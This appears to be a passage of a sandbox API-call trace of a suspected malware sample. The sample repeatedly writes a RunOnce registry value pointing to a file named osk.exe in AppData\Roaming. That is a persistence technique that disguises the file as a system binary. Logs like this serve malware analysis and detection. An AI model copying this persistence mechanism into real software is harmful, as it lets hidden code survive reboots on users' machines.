Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.475] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.475] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.475] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.475] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.475] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x24 [0078.475] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.475] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x25 [0078.475] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.476] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x24 
[0078.476] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.476] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.476] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.476] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.476] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.476] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.476] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.476] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.476] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.477] RegCloseKey (hKey=0x280) returned 0x0 [0078.477] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.477] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.477] SetTimer (hWnd=0x20280, nIDEvent=0x2024, uElapse=0xa, lpTimerFunc=0x0) returned 0x2024 [0078.477] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.494] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.494] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.494] KillTimer (hWnd=0x20280, uIDEvent=0x2024) returned 1 [0078.494] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.494] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.494] IUnknown:Release (This=0x787518) returned 0x1 [0078.495] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.495] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.495] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.495] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.495] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.495] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.495] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.495] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.495] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.495] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x25 [0078.495] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.496] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x26 [0078.496] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.497] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x25 [0078.497] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.497] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.497] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0078.497] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.497] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.497] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.497] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.497] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.497] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.498] RegCloseKey (hKey=0x280) returned 0x0 [0078.498] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.498] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.498] SetTimer (hWnd=0x20280, nIDEvent=0x2025, uElapse=0xa, lpTimerFunc=0x0) returned 0x2025 [0078.498] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.508] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.508] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.508] KillTimer (hWnd=0x20280, uIDEvent=0x2025) returned 1 [0078.508] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.508] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.508] IUnknown:Release (This=0x787518) returned 0x1 [0078.508] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.509] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.509] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.509] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.509] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.509] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.509] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.509] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.509] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.509] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x26 [0078.509] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.509] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x27 [0078.509] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.510] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x26 [0078.511] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.511] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.511] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.511] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0078.511] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.511] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.511] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.511] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.511] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.512] RegCloseKey (hKey=0x280) returned 0x0 [0078.512] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.512] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.512] SetTimer (hWnd=0x20280, nIDEvent=0x2026, uElapse=0xa, lpTimerFunc=0x0) returned 0x2026 [0078.512] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.127] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.127] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.128] KillTimer (hWnd=0x20280, uIDEvent=0x2026) returned 1 [0079.128] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.128] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.128] IUnknown:Release (This=0x787518) returned 0x1 [0079.128] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.128] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.128] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
